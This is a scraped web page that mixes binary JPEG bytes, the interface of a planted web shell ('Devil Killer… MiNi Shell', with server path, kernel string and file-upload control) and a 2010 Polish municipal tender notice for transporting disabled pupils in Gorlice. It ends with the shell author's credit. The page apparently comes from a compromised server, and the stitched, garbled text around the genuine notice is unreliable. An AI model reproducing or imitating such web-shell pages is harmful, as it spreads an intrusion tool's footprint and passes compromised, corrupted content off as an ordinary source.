JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100719/214646-N-2010.html

<p class="kh_header"><b>Gorlice: DOWÓZ UCZNIÓW NIEPEŁNOSPRAWNYCH ZAMIESZKAŁYCH     
      NA TERENIE GMINY MIEJSKIEJ GORLICE DO SPECJALNEGO   
       OŚRODKA SZKOLNO WYCHOWAWCZEGO W SZYMBARKU 
        I DO MIEJSKIEGO ZESPOŁU SZKÓŁ NR 3 W GORLICACH 
            UL. WYSZYŃSKIEGO W ROKU SZKOLNYM 2010/2011</b><br>
<b>Numer ogłoszenia: 214646 - 2010; data zamieszczenia: 19.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Gorlice, Urząd Miejski , ul. Rynek 2, 38-300 Gorlice, woj. małopolskie, tel. 018 3551252, faks 018 3551212.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.gorlice.pl/miasto</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOWÓZ UCZNIÓW NIEPEŁNOSPRAWNYCH ZAMIESZKAŁYCH     
      NA TERENIE GMINY MIEJSKIEJ GORLICE DO SPECJALNEGO   
       OŚRODKA SZKOLNO WYCHOWAWCZEGO W SZYMBARKU 
        I DO MIEJSKIEGO ZESPOŁU SZKÓŁ NR 3 W GORLICACH 
            UL. WYSZYŃSKIEGO W ROKU SZKOLNYM 2010/2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1. Przedmiotem zamówienia jest świadczenie usług w zakresie transportu i opieki podczas przewozu uczniów niepełnosprawnych zamieszkałych na terenie Miasta Gorlice w roku szkolnym 2010/2011, którzy obowiązek szkolny lub obowiązek nauki realizują w szkołach dostosowanych do ich niepełnosprawności. 

1.2. Uczniowie będą przewożeni na trasie:
       1) Gorlice - Miejski Zespół Szkół nr 3 w Gorlicach, ul. Wyszyńskiego i z powrotem - 2 uczniów,       
       2) Gorlice  - Specjalny  Ośrodek  Szkolno- Wychowawczy w Szymbarku i z powrotem - 13 uczniów, 

1.3. Dzienny dowóz w chwili obecnej obejmuje 15 uczniów z tego 4 uczniów mieszka w internacie i jest przewożone rano w poniedziałek z domu do szkoły i zabierane w piątek ze szkoły do domu. 
Dni dowozu dla uczniów mieszkających w internacie mogą być zmienione w przypadku gdy dzień dowozu jest dniem wolnym od zajęć szkolnych. 

1.4. Przewidywana łączna dzienna liczba wozokilometrów - ok. 75 wzkm. 

1.5. Przewidziana liczba dni na realizację usługi - 187 dni. 

1.6. Trasy i  godziny przejazdu zostaną przekazane wybranemu Wykonawcy po podpisaniu umowy 
i sporządzeniu planu zajęć w poszczególnych placówkach oświatowych, przy czym należy przyjąć iż obecnie trasa przejazdu uwzględnia następujące ulice: Broniewskiego, Narutowicza, Konopnickiej, Krakowska, Krasińskiego, Warneńczyka, Batorego, Krzywa, Skrzyńskich, Sikorskiego, Chopina, Biecka. 

1.7. Dowóz odbywał się będzie w dni nauki szkolnej od poniedziałku do piątku dostosowany do planu lekcji . Godziny rozpoczęcia lekcji przeciętnie 8:00 - 8:10, a zakończenia zajęć szkolnych 14:00- 15:30. Czas przejazdu w jedna stronę od pierwszego przystanku to ok. 1 godzina.

1.8. Do obowiązków Wykonawcy w trakcie realizacji usługi w szczególności należy:
1) dopilnowanie ładu i porządku przy wsiadaniu i zajmowaniu przez uczniów miejsc w pojeździe,
2) zwracanie uwagi na właściwe zachowanie się uczniów w czasie przejazdu i w miejscach 
    oczekiwania przed odjazdem pojazdu,
3) zapewnienie bezpiecznego wsiadania i wysiadania uczniów z pojazdu,
4) zapewnienie wszystkim uczniom miejsc siedzących, 
5) odbieranie dzieci od rodziców  na wyznaczonym miejscu przed rozpoczęciem zajęć lekcyjnych,
6) po przywiezieniu do szkoły przyprowadzanie dzieci do szatni i przekazanie osobie dyżurującej, 
   po zakończeniu zajęć odbieranie dzieci z szatni szkoły i po odwiezieniu przekazanie pod opiekę 
   rodzicom.
7) zwracanie  uwagi  na właściwe zachowanie się dzieci podczas przejazdu, 
8) współpraca z Wydziałem Oświaty Kultury i Sportu, zgłaszanie zmian dotyczących przewozu 
    uczniów niepełnosprawnych, czasu rozpoczęcia i zakończenia usługi,
9) prowadzenie dokumentacji usługi  w postaci dziennika przewozu uczniów zawierającego co 
    najmniej następujące informacje:
    a) listę obecności podczas danego przejazdu,
    b) uwagi o zachowaniu uczniów w czasie przejazdu,
    10) okazywanie w każdej sytuacji  życzliwości uczniom niepełnosprawnym, a w sytuacjach 
          konfliktowych, należy mieć na uwadze poszkodowanie przez los tych osób,
    11) w przypadku awarii autobusu przewożącego uczniów sprawowanie opieki nad dowożonymi 
          uczniami, zapewniając im bezpieczeństwo do czasu zapewnienia im pojazdu zastępczego 
          i potem w autobusie zastępczym,
    12) posiadanie w czasie wykonywania usługi w autobusie stale czynnego i sprawnego telefonu 
          komórkowego.
    13) obowiązkowo posiadanie  możliwości kontaktu telefonicznego z rodzicami i placówką na 
          wypadek zmian godzin przyjazdu i odjazdu wynikających z sytuacji niezależnych, przekazanie 
          ewentualnie informacji ze szkoły do domu rodzinnego dziecka i odwrotnie,

1.9. Zamawiający zastrzega sobie prawo:
1) zwiększenia liczby przewożonych uczniów w trakcie realizacji usługi , 
2) zmiany rozkładu jazdy tj. zmiany trasy, jej długości i godzin przewozu uczniów zachowując 
    jednocześnie niezmienną stawkę za 1 wozokilometr przedstawioną w formularzu ofertowym 
    Wykonawcy,
3) zlecenia Wykonawcy dodatkowych przewozów szkolnych, zachowując  jednocześnie 
    niezmienną stawkę za  1 wozokilometr.
      Zamawiający o zmianach  powiadomi Wykonawcę pisemnie w terminie co najmniej 2 dni przed 
      planowaną zmianą.

1.10. Wykonawca wykonując przedmiot zamówienia, zobowiązuje się do:
      1) stosowania przepisów ustawy o ochronie danych osobowych oraz procedur określonych przez
          administratora danych,
      2) złożenia oświadczenia o zachowaniu w tajemnicy przetwarzanych danych osobowych oraz sposobów ich zabezpieczenia.

1.11. Zabronione jest przewożenie w autobusie podczas wykonywania usługi przewozu dzieci do 
ośrodków szkolnych i z powrotem do domów osób trzecich.

1.12. Wykonawca zobowiązuje się wykonywać usługę zgodnie z obowiązującymi w zakresie przewozu 
osób przepisami prawa. W szczególności na Wykonawcy spoczywa obowiązek uzyskania wszelkich niezbędnych w tym zakresie pozwoleń i uzgodnień.

1.13. Opiekun winien przebywać w tej części pojazdu w której siedzą uczniowie w celu podejmowania 
interwencji w razie niespokojnego zachowania się uczniów natychmiast, bez konieczności zatrzymywania pojazdu.

1.14. Wykonawca zobowiązany jest do skontaktowania się telefonicznie z opiekunem ucznia 
w przypadku zmian wyznaczonych godzin przyjazdu spowodowanych opóźnieniem lub wcześniejszym przyjazdem autobusu w stosunku do obowiązującego rozkładu jazdy. Wykonawca zastosuje się do informacji uzyskanej od opiekuna ucznia jeśli czas oczekiwania na wyznaczonym miejscu (przystanku) nie będzie dłuższy niż 10 minut.

1.15. Zamawiający nie bierze żadnej odpowiedzialności za wypadki i zdarzenia jakiegokolwiek typu , 
w wyniku których nastąpi uszkodzenie ciała , śmierć czy szkoda materialna, spowodowana działalnością Wykonawcy. 

1.16. Wykonawca zamówienia musi realizować je zgodnie z przepisami prawa, a w szczególności 
zgodnie z ustawą z dnia 6 września 2001 r, o transporcie drogowym oraz ustawą z 20 czerwca 1997 r. prawo o ruchu drogowym. 

1.17. Wykonawca zapewnia sprawność techniczną pojazdu, a także odpowiednie kwalifikacje 
zawodowe kierowcy oraz opiekuna..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.14.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości 1.000,00 zł  (słownie zł: jeden tysiąc 
00/100).

Wadium musi obejmować okres związania ofertą to jest 30 dni od ostatecznego terminu składania ofert

Wadium może być wnoszone w jednej lub kilku następujących formach:
- pieniądzu,
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym    
  że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt.2 ustawy z dnia 9 
  listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158,   
  z późn. zm.).
Zamawiający poza formami wnoszenia wadium w/w nie dopuszcza innych form jego wnoszenia. 



Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego: Nr 59 2030 0045 1110 0000 0160 8370

W przypadku wnoszenia wadium w formie pieniężnej za termin wniesienia wadium przyjmuje się datę uznania rachunku Zamawiającego. Uznanie rachunku Zamawiającego musi nastąpić najpóźniej            w terminie składnia ofert tj. do dnia 28.07.2010 r. do godz. 13:00

Wadium w formie innej niż pieniądz należy wnieść najpóźniej w terminie składnia ofert tj. do dnia 28.07.2010 r. do godz. 13:00

Wadium wnoszone w formie innej niż pieniężna należy złożyć w formie oryginału w kasie zamawiającego. 
W przypadku wadium wnoszonego w poręczeniach lub gwarancjach data wygaśnięcia poręczenia lub gwarancji obejmować musi co najmniej 30 dniowy termin związania ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełnienia tego warunku:
W celu potwierdzenia spełnienia warunku należy wykazać posiadanie aktualnej licencji na wykonywanie krajowego transportu drogowego osób zgodnie z ustawą z dnia 6 września 2001 r. 
o transporcie drogowym (t.j. Dz. U z 2007 r., Nr 125, poz. 874 z późn. zm.). 
Wykonawca dołączy do oferty wymaganą licencję. 
Na podstawie złożonych dokumentów Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły :  spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełnienia tego warunku:
W celu potwierdzenia spełnienia warunku należy wykazać dysponowanie przy realizacji zamówienia co najmniej 2 pojazdami do przewozu osób - dopuszczonymi do ruchu, odpowiednio oznakowanymi 
(1 autobus którym wykonywana będzie usługa i 1 autobus rezerwowy) z zastrzeżeniem, iż ilość miejsc siedzących w pojazdach nie może być mniejsza od liczby osób przewożonych na trasie. Wykonawca dołączy do oferty wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami.
Na podstawie złożonych dokumentów Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły :  spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełnienia tego warunku:
W celu potwierdzenia spełniania warunku należy wykazać dysponowanie przy realizacji zamówienia kierowcą posiadającym uprawnienia do kierowania autobusem i opiekunem przeszkolonymi w zakresie udzielania pierwszej pomocy medycznej lub przedmedycznej.
Wykonawca dołączy do oferty wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, 
w szczególności odpowiedzialnych za  świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami a także oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
Na podstawie złożonych dokumentów Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły :  spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełnienia tego warunku:
W celu spełniania warunku należy wykazać, iż wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 100.000,00 PLN. Wykonawca dołączy do oferty opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. 
Na podstawie złożonych dokumentów Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły :  spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony formularz OFERTA, który należy  sporządzić ściśle wg wzoru formularza stanowiącego zał. nr 2 do SIWZ. Formularz musi być podpisany przez osobę/osoby uprawnione do składania  oświadczeń woli w zakresie praw i obowiązków majątkowych wykonawcy z podaniem ceny za 1 wozokilometr przewozu uczniów:
  - netto
              -  podatek VAT
              -  brutto
              oraz łącznej ceny oferty brutto podlegającej ocenie
  oraz załączniki:
      2.    Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy 
             składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów,
      3.    Przedsiębiorcy występujący jako spółka cywilna zamiast upoważnienia o którym mowa powyżej 
             mogą dołączyć do oferty umowę spółki cywilnej w przypadku gdy umowa spółki jednoznacznie 
             wskazuje na sposób reprezentowania spółki.
      4.    Potwierdzony przez upoważnionego przedstawiciela wykonawcy wzór umowy stanowiący     
      zał. nr 1 do SIWZ,
5.   Dowód wniesienia (wpłacenia) wadium,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków tych zmian określa wzór umowy stanowiący zał. nr 1 do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gorlice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Miejska Gorlice - Urząd Miejski, 38- 300 Gorlice, Rynek 2, pok. 114.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.07.2010 godzina 13:00, miejsce: Gmina Miejska Gorlice - Urząd Miejski, 38- 300 Gorlice, Rynek 2, pok. 114.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com